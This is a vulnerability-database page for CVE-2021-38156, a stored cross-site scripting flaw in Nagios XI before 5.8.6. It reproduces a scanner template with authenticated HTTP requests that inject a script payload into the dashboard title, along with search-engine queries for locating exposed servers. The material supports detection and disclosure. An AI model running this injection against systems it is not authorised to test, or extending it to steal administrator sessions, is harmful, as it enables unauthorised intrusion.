Vulners
Lucene search
Nagios XI < 5.8.6 - Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2021-38156 | 15 Sep 202118:22 | – | circl |
 | Nagios XI 跨站脚本漏洞 | 15 Sep 202100:00 | – | cnnvd |
 | Nagios XI Cross-Site Scripting Vulnerability (CNVD-2021-90913) | 16 Sep 202100:00 | – | cnvd |
 | CVE-2021-38156 | 15 Sep 202113:20 | – | cve |
 | CVE-2021-38156 | 15 Sep 202113:20 | – | cvelist |
 | Vulnerabilities fixed in Nagios XI | 27 Oct 202100:00 | – | ncsc |
 | CVE-2021-38156 | 15 Sep 202114:15 | – | nvd |
 | CVE-2021-38156 | 15 Sep 202114:15 | – | osv |
 | Cross site scripting | 15 Sep 202114:15 | – | prion |
 | CVE-2021-38156 | 22 May 202520:08 | – | redhatcve |
10
id: CVE-2021-38156
info:
name: Nagios XI < 5.8.6 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.
impact: |
Authenticated attackers can inject malicious JavaScript via XSS in the dashboard title field, potentially stealing administrator session cookies or performing administrative actions.
remediation: |
Upgrade to Nagios XI version 5.8.6 or later.
reference:
- https://raxis.com/blog/cve-2021-38156/
- https://nvd.nist.gov/vuln/detail/CVE-2021-38156
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-38156
cwe-id: CWE-79
epss-score: 0.84015
epss-percentile: 0.99319
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
metadata:
max-request: 5
verified: true
vendor: nagios
product: nagios_xi
shodan-query: http.title:"nagios xi"
fofa-query: app="nagios-xi"
google-query: intitle:"nagios xi"
tags: cve,cve2021,nagios,nagiosxi,xss,authenticated,vuln
http:
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}
- |
GET /nagiosxi/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/ajaxhelper.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cmd=updatedashboard&id=home&opts=&title="><script>alert(document.domain)</script>&background=&transparent=0&submitButton=Submit&nsp={{nsp_auth}}
- |
GET /nagiosxi/dashboards/manage.php HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body_5
words:
- 'data-title=""><script>alert(document.domain)</script>'
- type: word
part: header_5
words:
- text/html
- type: status
status:
- 200
extractors:
- type: regex
name: nsp
part: body
group: 1
regex:
- "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
internal: true
- type: regex
name: nsp_auth
part: body
group: 1
regex:
- "var nsp_str = ['\"](.*)['\"];"
internal: true
# digest: 4b0a00483046022100a12f3b6314834494984766aadb9c8323a20fd09a43198e61f0f9e04d47a1e1c9022100aa8cb1e9e125721fae8d45e1c86e9795a0db654ede28630a377aebcf41998b35:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 23.5
CVSS 3.15.4
EPSS0.84015